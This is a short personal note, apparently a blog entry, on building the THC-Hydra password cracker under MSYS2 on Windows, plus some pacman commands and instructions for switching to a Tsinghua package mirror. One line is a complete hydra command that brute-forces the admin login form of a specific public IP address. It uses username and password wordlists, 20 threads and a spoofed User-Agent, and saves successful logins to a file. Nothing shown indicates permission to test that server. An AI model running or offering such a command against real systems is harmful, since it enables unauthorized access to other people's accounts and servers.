Updated on 2019-03-01

MSYS2

hydra

Step

D:\Work\Download\thc-hydra-master>

pacman -Syu
pacman -S --noconfirm --needed gcc make openssl-devel

./configure && make

hydra -V -F -L username.txt -P password.txt -o ok.txt -t 20 'http-post-form://222.69.159.53:80/cm_admin/login.aspx:txtloginid=^USER^&txtpsw=^PASS^:F=password incorrect!:H=User-Agent\: wget'
pacman -F  jq.exe #搜索软件包(By File)
pacman -Ss gcc    #搜索软件包(By Name)
pacman -Sg mingw-w64-x86_64-toolchain mingw-w64-i686-toolchain #查看软件组
echo 'Server = https://mirrors.tuna.tsinghua.edu.cn/msys2/msys/$arch/' > /etc/pacman.d/mirrorlist.msys
echo 'Server = https://mirrors.tuna.tsinghua.edu.cn/msys2/mingw/i686/' > /etc/pacman.d/mirrorlist.mingw32
echo 'Server = https://mirrors.tuna.tsinghua.edu.cn/msys2/mingw/x86_64/' > /etc/pacman.d/mirrorlist.mingw64
pacman -Sy

Reference